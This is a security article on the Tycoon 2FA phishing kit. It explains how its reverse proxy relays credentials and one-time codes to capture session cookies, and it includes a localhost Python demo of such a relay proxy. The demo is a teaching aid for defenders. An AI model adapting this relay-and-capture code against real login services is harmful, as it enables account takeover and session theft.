Tycoon 2FA: MFA-Bypassing Phishing Kit

Tycoon 2FA is a phishing-as-a-service (PhaaS) platform that targets Microsoft 365 and Gmail accounts and defeats two-factor authentication (2FA). It does not break the second factor itself: it lets the victim complete the MFA step against the real service and steals the authenticated session that results.

Sekoia analysts discovered Tycoon 2FA in October 2023 during routine threat hunting; the kit has been active since at least August 2023. It was initially sold through private Telegram channels by the Saad Tycoon group and has quickly gained traction among cybercriminals.

Like other adversary-in-the-middle (AitM) kits, Tycoon 2FA runs a reverse proxy that serves the phishing pages. The proxy relays everything the victim submits (username, password, and the OTP or push approval) to the legitimate service, so the real login succeeds with a valid second factor. The service then issues a session cookie, which passes back through the proxy and is captured by the attacker. With that cookie the attacker has an authenticated session without ever needing the victim's second factor again; this is why one-time codes and push prompts offer no protection against the kit.

Sekoia’s report describes Tycoon 2FA attacks in seven stages:

  1. Distribution of malicious links via email or QR codes.
  2. A CAPTCHA-style security challenge that filters out bots, scanners and sandboxes before any phishing content is served.
  3. Extraction of the victim's email address from the URL, used to pre-fill and customize the attack.
  4. Redirection to another page of the phishing site, one step closer to the fake login page.
  5. A fake Microsoft login page that captures the victim's credentials and relays them to the real service.
  6. A mimicked 2FA challenge that captures the victim's one-time code or push response, relays it, and so obtains a valid session token.
  7. Redirection to a legitimate-looking page so the victim does not realize the phishing attack succeeded.
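The following is an added, self-contained illustration of stages 5 and 6 and of the relay described above; it is not code from Sekoia's report or from the Tycoon 2FA kit. It stands up a stub identity provider (a constructed stand-in for Microsoft 365 or Gmail) and a minimal relaying proxy on localhost. The user name, password, OTP and cookie value are all constructed. The stub accepts either a relayable OTP or an origin-bound factor; the latter models how WebAuthn/FIDO2 binds the response to the origin the browser actually talked to, which is an assumption of the model rather than a full WebAuthn implementation.

```python
import threading
import urllib.error
import urllib.request
from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib.parse import parse_qs, urlencode

# Constructed demo values: a stand-in for the real service and its session cookie.
VALID_USER, VALID_PASSWORD, VALID_OTP = "alice@example.com", "Winter2024!", "123456"
SESSION_COOKIE = "ESTSAUTH=constructed-session-token"


class IdPHandler(BaseHTTPRequestHandler):
    """Stub identity provider: password plus a second factor, then a session cookie."""

    def do_POST(self):
        length = int(self.headers.get("Content-Length", 0))
        form = {k: v[0] for k, v in parse_qs(self.rfile.read(length).decode()).items()}
        my_origin = f"http://127.0.0.1:{self.server.server_port}"
        ok = form.get("user") == VALID_USER and form.get("password") == VALID_PASSWORD
        if "mfa_origin" in form:
            # Origin-bound factor: models WebAuthn, where the browser signs the origin it
            # is talking to. A proxy cannot rewrite it without breaking the signature.
            ok = ok and form["mfa_origin"] == my_origin
        else:
            # Relayable factor: a one-time code (or a push approval) is just data.
            ok = ok and form.get("otp") == VALID_OTP
        body = b"signed in" if ok else b"denied"
        self.send_response(200 if ok else 401)
        if ok:
            self.send_header("Set-Cookie", SESSION_COOKIE)  # the post-MFA session
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)

    def log_message(self, *_):
        pass


def make_proxy_handler(upstream, captured):
    """AitM reverse proxy: relay the victim's POST upstream, keep any Set-Cookie."""

    class ProxyHandler(BaseHTTPRequestHandler):
        def do_POST(self):
            length = int(self.headers.get("Content-Length", 0))
            body = self.rfile.read(length)  # credentials and MFA response, verbatim
            req = urllib.request.Request(upstream + self.path, data=body, method="POST")
            try:
                resp = urllib.request.urlopen(req)
                status = resp.status
            except urllib.error.HTTPError as e:
                resp, status = e, e.code
            data = resp.read()
            cookie = resp.headers.get("Set-Cookie")
            if cookie:
                captured.append(cookie)  # the attacker's prize: a live session cookie
            self.send_response(status)
            if cookie:
                self.send_header("Set-Cookie", cookie)  # victim is logged in too
            self.send_header("Content-Length", str(len(data)))
            self.end_headers()
            self.wfile.write(data)

        def log_message(self, *_):
            pass

    return ProxyHandler


def serve(handler):
    server = HTTPServer(("127.0.0.1", 0), handler)
    threading.Thread(target=server.serve_forever, daemon=True).start()
    return server


def victim_login(url, form):
    """Victim submits the login form to whatever URL the phishing link pointed at."""
    req = urllib.request.Request(url + "/login", data=urlencode(form).encode(), method="POST")
    try:
        with urllib.request.urlopen(req) as resp:
            return resp.status, resp.headers.get("Set-Cookie")
    except urllib.error.HTTPError as e:
        return e.code, None


def run_demo():
    idp = serve(IdPHandler)
    real = f"http://127.0.0.1:{idp.server_port}"
    captured = []
    proxy = serve(make_proxy_handler(real, captured))
    phish = f"http://127.0.0.1:{proxy.server_port}"
    creds = {"user": VALID_USER, "password": VALID_PASSWORD}
    # OTP is relayed: the real login succeeds and the proxy sees the cookie.
    otp_result = victim_login(phish, {**creds, "otp": VALID_OTP})
    # Origin-bound factor: the browser binds the response to the phishing origin,
    # which the real service rejects, so no session is ever issued to capture.
    bound_result = victim_login(phish, {**creds, "mfa_origin": phish})
    idp.shutdown()
    proxy.shutdown()
    return {"otp": otp_result, "origin_bound": bound_result, "captured": list(captured)}


if __name__ == "__main__":
    print(run_demo())
```

The point the demo makes is that the second factor is never "bypassed": it is completed by the victim against the real service, and the proxy simply sits on the path where the resulting session cookie travels. An authenticator whose response is bound to the origin the browser actually loaded leaves the proxy with nothing usable.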

The latest version of Tycoon 2FA, released in 2024, carries significant changes aimed at phishing effectiveness and evasion: reworked JavaScript and HTML, altered resource retrieval, and improved filtering of unwanted traffic such as bots and analysis tools.

Despite its recent emergence, Tycoon 2FA already has a substantial criminal user base. The Bitcoin wallet associated with the operation has recorded over 1,800 transactions since October 2019, totaling more than $394,015 worth of cryptocurrency, which points to widespread use in phishing operations.

Among the many PhaaS offerings available, Tycoon 2FA stands out for how reliably it defeats 2FA. Because the kit relays one-time codes and push approvals to the real service, those factors do not stop it; phishing-resistant, origin-bound authenticators (FIDO2/WebAuthn) and controls that limit what a stolen session token can do are the measures that actually blunt this class of attack.

For organizations and individuals seeking to protect themselves, the indicators of compromise (IoCs) tied to Tycoon 2FA operations are a practical starting point for detection. Sekoia has published a repository with over 50 IoCs to support detection and mitigation efforts.

Read the original post here.

Tomislav Filipov, Author